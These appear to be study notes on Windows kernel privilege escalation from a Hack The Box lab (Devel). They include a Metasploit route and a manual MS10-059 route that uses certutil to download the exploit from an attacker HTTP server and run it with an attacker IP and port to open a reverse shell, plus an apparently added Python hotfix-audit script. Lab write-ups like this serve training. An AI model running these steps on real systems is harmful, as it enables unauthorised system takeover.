3.kernel Exploits

Overview

![[image.BPHLW1.png]] ![[image.O2EHW1.png]]

  • The reason we need `systeminfo` output is that kernel exploits are specific to the Windows version, build and installed patches (hotfixes).
  • If we own the kernel, we own the system - that's what we are trying to do.
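
The build/hotfix check the bullets above describe, written as an added example (not from the original notes): it parses `systeminfo` output and reports which of the two bulletins discussed below have no corresponding hotfix installed, which is the same check a patch audit makes. The sample output is constructed, and the bulletin-to-KB mapping is assumed (MS10-015 as KB977165, MS10-059 as KB982799); verify it against the Microsoft bulletins before relying on it.

```python
import re

# Constructed sample of `systeminfo` output; not captured from any real host.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WORKSTATION01
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB977165
                           [02]: KB2534111
"""

# Assumed mapping of bulletin -> KB that shipped the fix (check against MSRC).
BULLETIN_KB = {"MS10-015": "KB977165", "MS10-059": "KB982799"}


def parse_systeminfo(text):
    """Extract OS version, architecture and the set of installed KB hotfixes."""
    info = {"os_version": None, "arch": None, "hotfixes": set()}
    for line in text.splitlines():
        m = re.match(r"^OS Version:\s+(\S+)", line)
        if m:
            info["os_version"] = m.group(1)
        m = re.match(r"^System Type:\s+(\S+)", line)
        if m:
            info["arch"] = m.group(1)
        # Hotfix lines look like "[01]: KB977165"; collect every KB id seen.
        for kb in re.findall(r"\bKB\d+\b", line):
            info["hotfixes"].add(kb)
    return info


def missing_patches(info, bulletin_kb=BULLETIN_KB):
    """Return the bulletins whose fix KB is not in the installed hotfix list."""
    return sorted(b for b, kb in bulletin_kb.items() if kb not in info["hotfixes"])


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(parsed["os_version"], parsed["arch"])
    print("Missing:", missing_patches(parsed))  # → Missing: ['MS10-059']
```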

Escalation with Metasploit (Example - Devel HTB)

  1. Background the meterpreter session ![[image.BPVLW1.png]]

  2. Search and use the exploit you found by priv suggester ![[image.GMWMW1.png]]

  3. Set the appropriate meterpreter session (and the other options) ![[image.T59QW1.png]]

  4. Run and get another meterpreter session! ![[image.ILWHW1.png]]

  5. Be root ![[image.1GM9V1.png]]

Manual Kernel Exploitation (Devel - HTB)

  1. Search Google for the specific kernel exploit
  • ms10-015 doesn't work because we don't have GUI access
  • so keep working through them & researching each one
  • Rest of example is with MS10-059 (chimichurri exploit)
  2. Download the .exe to the attacking machine ![[image.59C9V1.png]]

  3. Set up a Python HTTP server on the attacking machine to host the file for the victim to download

  4. Go to the temp folder (likely have write access here) ![[image.ZQL8V1.png]]

  5. Download the file with the certutil command (similar to wget on Linux) ![[image.MLLGW1.png]]

  6. Run the exploit with the proper syntax (ms.exe <attacker_IP> <attacker_port>) ![[image.PR0HW1.png]]

  7. On the attacking machine, open another shell listening on the correct port ![[image.EEODW1.png]]

  8. Become root! ![[image.TYR6V1.png]]